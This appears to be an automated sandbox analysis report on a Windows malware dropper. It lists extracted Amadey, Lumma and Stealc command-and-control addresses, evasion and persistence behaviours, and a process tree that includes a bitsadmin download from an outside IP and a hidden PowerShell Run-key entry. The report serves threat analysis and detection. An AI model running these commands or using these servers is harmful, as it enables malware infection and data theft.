Analysis
-
max time kernel
111s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 00:11
Static task
static1
Behavioral task
behavioral1
Sample
BWDAN_file.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
BWDAN_file.exe
Resource
win10v2004-20241007-en
General
-
Target
BWDAN_file.exe
-
Size
1.8MB
-
MD5
b3778394044fb4bd48df1134fc3768c9
-
SHA1
dcb60c2520fc805a10ac2db5c768b0532adda42b
-
SHA256
b0ebf31b0ded84953d0b471f380c0743832dc360eed391b5195c997d99f34d85
-
SHA512
36987385f0405da6fbf4d22517c34b5bef9dd8d798401f55735dbbb1c6b38f0d3fe3c7628e74218125903260e876a4ce68b6f79f5d915b4c4c7eb417b806371f
-
SSDEEP
49152:fbf1+D8s1ITM7ZzPqEdb9fyu7TwzLX8rkuDif4BTsU:fbsD8s1Waqw97TwXMrkuOf4B1
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://preside-comforter.sbs
https://savvy-steereo.sbs
https://copper-replace.sbs
https://record-envyp.sbs
https://slam-whipp.sbs
https://wrench-creter.sbs
https://looky-marked.sbs
https://plastic-mitten.sbs
https://tail-cease.cyou
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://tail-cease.cyou/api
Signatures
-
Amadey family
-
Lumma family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ BWDAN_file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ nbea1t8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 874c45f7a1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3e29ac4e6c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 68dd47c68d.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 1456 powershell.exe 4432 powershell.exe 5984 powershell.exe 4432 powershell.exe 1456 powershell.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
pid Process 5052 bitsadmin.exe 3920 bitsadmin.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nbea1t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 874c45f7a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BWDAN_file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 874c45f7a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3e29ac4e6c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BWDAN_file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nbea1t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3e29ac4e6c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation BWDAN_file.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation skotes.exe -
Executes dropped EXE 13 IoCs
pid Process 668 skotes.exe 2904 skotes.exe 4176 nbea1t8.exe 4152 tvtC9D3.exe 644 uxN4wDZ.exe 1236 uxN4wDZ.exe 3220 uxN4wDZ.exe 3332 skotes.exe 4300 TcMBq5M.exe 3620 874c45f7a1.exe 4260 3e29ac4e6c.exe 3852 4f5b1a7e7e.exe 5876 68dd47c68d.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 3e29ac4e6c.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 68dd47c68d.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine BWDAN_file.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine nbea1t8.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 874c45f7a1.exe -
Loads dropped DLL 5 IoCs
pid Process 4152 tvtC9D3.exe 4152 tvtC9D3.exe 3480 MsiExec.exe 3480 MsiExec.exe 4152 tvtC9D3.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1009905001\\nbea1t8.exe'\"" nbea1t8.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\874c45f7a1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010059001\\874c45f7a1.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3e29ac4e6c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010060001\\3e29ac4e6c.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4f5b1a7e7e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010061001\\4f5b1a7e7e.exe" skotes.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: TcMBq5M.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: TcMBq5M.exe File opened (read-only) \??\X: TcMBq5M.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: TcMBq5M.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: TcMBq5M.exe File opened (read-only) \??\Z: TcMBq5M.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: TcMBq5M.exe File opened (read-only) \??\T: TcMBq5M.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\M: TcMBq5M.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\O: TcMBq5M.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: TcMBq5M.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: TcMBq5M.exe File opened (read-only) \??\L: TcMBq5M.exe File opened (read-only) \??\Y: TcMBq5M.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: TcMBq5M.exe File opened (read-only) \??\J: TcMBq5M.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: TcMBq5M.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: TcMBq5M.exe File opened (read-only) \??\E: TcMBq5M.exe File opened (read-only) \??\I: TcMBq5M.exe File opened (read-only) \??\W: TcMBq5M.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: TcMBq5M.exe File opened (read-only) \??\Q: TcMBq5M.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000300000000074b-185.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 4784 BWDAN_file.exe 668 skotes.exe 2904 skotes.exe 4176 nbea1t8.exe 3332 skotes.exe 3620 874c45f7a1.exe 4260 3e29ac4e6c.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 644 set thread context of 3220 644 uxN4wDZ.exe 114 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job BWDAN_file.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 6044 MSIC080.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 21 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TcMBq5M.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3e29ac4e6c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nbea1t8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tvtC9D3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4f5b1a7e7e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BWDAN_file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 874c45f7a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ping.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 68dd47c68d.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4100 ping.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f59c2d6185d8bf0c0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f59c2d610000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f59c2d61000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df59c2d61000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f59c2d6100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 924 taskkill.exe 1892 taskkill.exe 2192 taskkill.exe 4188 taskkill.exe 2608 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings firefox.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4100 ping.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5220 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 4784 BWDAN_file.exe 4784 BWDAN_file.exe 668 skotes.exe 668 skotes.exe 2904 skotes.exe 2904 skotes.exe 4176 nbea1t8.exe 4176 nbea1t8.exe 3332 skotes.exe 3332 skotes.exe 3620 874c45f7a1.exe 3620 874c45f7a1.exe 4260 3e29ac4e6c.exe 4260 3e29ac4e6c.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 3256 msiexec.exe Token: SeCreateTokenPrivilege 4300 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 4300 TcMBq5M.exe Token: SeLockMemoryPrivilege 4300 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 4300 TcMBq5M.exe Token: SeMachineAccountPrivilege 4300 TcMBq5M.exe Token: SeTcbPrivilege 4300 TcMBq5M.exe Token: SeSecurityPrivilege 4300 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 4300 TcMBq5M.exe Token: SeLoadDriverPrivilege 4300 TcMBq5M.exe Token: SeSystemProfilePrivilege 4300 TcMBq5M.exe Token: SeSystemtimePrivilege 4300 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 4300 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 4300 TcMBq5M.exe Token: SeCreatePagefilePrivilege 4300 TcMBq5M.exe Token: SeCreatePermanentPrivilege 4300 TcMBq5M.exe Token: SeBackupPrivilege 4300 TcMBq5M.exe Token: SeRestorePrivilege 4300 TcMBq5M.exe Token: SeShutdownPrivilege 4300 TcMBq5M.exe Token: SeDebugPrivilege 4300 TcMBq5M.exe Token: SeAuditPrivilege 4300 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 4300 TcMBq5M.exe Token: SeChangeNotifyPrivilege 4300 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 4300 TcMBq5M.exe Token: SeUndockPrivilege 4300 TcMBq5M.exe Token: SeSyncAgentPrivilege 4300 TcMBq5M.exe Token: SeEnableDelegationPrivilege 4300 TcMBq5M.exe Token: SeManageVolumePrivilege 4300 TcMBq5M.exe Token: SeImpersonatePrivilege 4300 TcMBq5M.exe Token: SeCreateGlobalPrivilege 4300 TcMBq5M.exe Token: SeCreateTokenPrivilege 4300 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 4300 TcMBq5M.exe Token: SeLockMemoryPrivilege 4300 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 4300 TcMBq5M.exe Token: SeMachineAccountPrivilege 4300 TcMBq5M.exe Token: SeTcbPrivilege 4300 TcMBq5M.exe Token: SeSecurityPrivilege 4300 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 4300 TcMBq5M.exe Token: SeLoadDriverPrivilege 4300 TcMBq5M.exe Token: SeSystemProfilePrivilege 4300 TcMBq5M.exe Token: SeSystemtimePrivilege 4300 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 4300 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 4300 TcMBq5M.exe Token: SeCreatePagefilePrivilege 4300 TcMBq5M.exe Token: SeCreatePermanentPrivilege 4300 TcMBq5M.exe Token: SeBackupPrivilege 4300 TcMBq5M.exe Token: SeRestorePrivilege 4300 TcMBq5M.exe Token: SeShutdownPrivilege 4300 TcMBq5M.exe Token: SeDebugPrivilege 4300 TcMBq5M.exe Token: SeAuditPrivilege 4300 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 4300 TcMBq5M.exe Token: SeChangeNotifyPrivilege 4300 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 4300 TcMBq5M.exe Token: SeUndockPrivilege 4300 TcMBq5M.exe Token: SeSyncAgentPrivilege 4300 TcMBq5M.exe Token: SeEnableDelegationPrivilege 4300 TcMBq5M.exe Token: SeManageVolumePrivilege 4300 TcMBq5M.exe Token: SeImpersonatePrivilege 4300 TcMBq5M.exe Token: SeCreateGlobalPrivilege 4300 TcMBq5M.exe Token: SeCreateTokenPrivilege 4300 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 4300 TcMBq5M.exe Token: SeLockMemoryPrivilege 4300 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 4300 TcMBq5M.exe Token: SeMachineAccountPrivilege 4300 TcMBq5M.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
pid Process 4784 BWDAN_file.exe 4300 TcMBq5M.exe 216 msiexec.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe -
Suspicious use of SendNotifyMessage 28 IoCs
pid Process 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 1200 firefox.exe 3852 4f5b1a7e7e.exe 3852 4f5b1a7e7e.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1200 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4784 wrote to memory of 668 4784 BWDAN_file.exe 83 PID 4784 wrote to memory of 668 4784 BWDAN_file.exe 83 PID 4784 wrote to memory of 668 4784 BWDAN_file.exe 83 PID 668 wrote to memory of 4176 668 skotes.exe 102 PID 668 wrote to memory of 4176 668 skotes.exe 102 PID 668 wrote to memory of 4176 668 skotes.exe 102 PID 668 wrote to memory of 4152 668 skotes.exe 103 PID 668 wrote to memory of 4152 668 skotes.exe 103 PID 668 wrote to memory of 4152 668 skotes.exe 103 PID 4152 wrote to memory of 4100 4152 tvtC9D3.exe 104 PID 4152 wrote to memory of 4100 4152 tvtC9D3.exe 104 PID 4152 wrote to memory of 4100 4152 tvtC9D3.exe 104 PID 4152 wrote to memory of 5052 4152 tvtC9D3.exe 106 PID 4152 wrote to memory of 5052 4152 tvtC9D3.exe 106 PID 4152 wrote to memory of 5052 4152 tvtC9D3.exe 106 PID 668 wrote to memory of 644 668 skotes.exe 111 PID 668 wrote to memory of 644 668 skotes.exe 111 PID 668 wrote to memory of 644 668 skotes.exe 111 PID 644 wrote to memory of 1236 644 uxN4wDZ.exe 113 PID 644 wrote to memory of 1236 644 uxN4wDZ.exe 113 PID 644 wrote to memory of 1236 644 uxN4wDZ.exe 113 PID 644 wrote to memory of 3220 644 uxN4wDZ.exe 114 PID 644 wrote to memory of 3220 644 uxN4wDZ.exe 114 PID 644 wrote to memory of 3220 644 uxN4wDZ.exe 114 PID 644 wrote to memory of 3220 644 uxN4wDZ.exe 114 PID 644 wrote to memory of 3220 644 uxN4wDZ.exe 114 PID 644 wrote to memory of 3220 644 uxN4wDZ.exe 114 PID 644 wrote to memory of 3220 644 uxN4wDZ.exe 114 PID 644 wrote to memory of 3220 644 uxN4wDZ.exe 114 PID 644 wrote to memory of 3220 644 uxN4wDZ.exe 114 PID 644 wrote to memory of 3220 644 uxN4wDZ.exe 114 PID 668 wrote to memory of 4300 668 skotes.exe 117 PID 668 wrote to memory of 4300 668 skotes.exe 117 PID 668 wrote to memory of 4300 668 skotes.exe 117 PID 3256 wrote to memory of 3480 3256 msiexec.exe 123 PID 3256 wrote to memory of 3480 3256 msiexec.exe 123 PID 3256 wrote to memory of 3480 3256 msiexec.exe 123 PID 4300 wrote to memory of 216 4300 TcMBq5M.exe 124 PID 4300 wrote to memory of 216 4300 TcMBq5M.exe 124 PID 4300 wrote to memory of 216 4300 TcMBq5M.exe 124 PID 668 wrote to memory of 3620 668 skotes.exe 125 PID 668 wrote to memory of 3620 668 skotes.exe 125 PID 668 wrote to memory of 3620 668 skotes.exe 125 PID 4152 wrote to memory of 3920 4152 tvtC9D3.exe 129 PID 4152 wrote to memory of 3920 4152 tvtC9D3.exe 129 PID 4152 wrote to memory of 3920 4152 tvtC9D3.exe 129 PID 668 wrote to memory of 4260 668 skotes.exe 131 PID 668 wrote to memory of 4260 668 skotes.exe 131 PID 668 wrote to memory of 4260 668 skotes.exe 131 PID 668 wrote to memory of 3852 668 skotes.exe 132 PID 668 wrote to memory of 3852 668 skotes.exe 132 PID 668 wrote to memory of 3852 668 skotes.exe 132 PID 3852 wrote to memory of 2192 3852 4f5b1a7e7e.exe 133 PID 3852 wrote to memory of 2192 3852 4f5b1a7e7e.exe 133 PID 3852 wrote to memory of 2192 3852 4f5b1a7e7e.exe 133 PID 3852 wrote to memory of 4188 3852 4f5b1a7e7e.exe 137 PID 3852 wrote to memory of 4188 3852 4f5b1a7e7e.exe 137 PID 3852 wrote to memory of 4188 3852 4f5b1a7e7e.exe 137 PID 3852 wrote to memory of 2608 3852 4f5b1a7e7e.exe 139 PID 3852 wrote to memory of 2608 3852 4f5b1a7e7e.exe 139 PID 3852 wrote to memory of 2608 3852 4f5b1a7e7e.exe 139 PID 3852 wrote to memory of 924 3852 4f5b1a7e7e.exe 141 PID 3852 wrote to memory of 924 3852 4f5b1a7e7e.exe 141 PID 3852 wrote to memory of 924 3852 4f5b1a7e7e.exe 141 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\BWDAN_file.exe"C:\Users\Admin\AppData\Local\Temp\BWDAN_file.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4176
-
-
C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Windows\SysWOW64\ping.exeping -n 1 8.8.8.84⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4100
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:5052
-
-
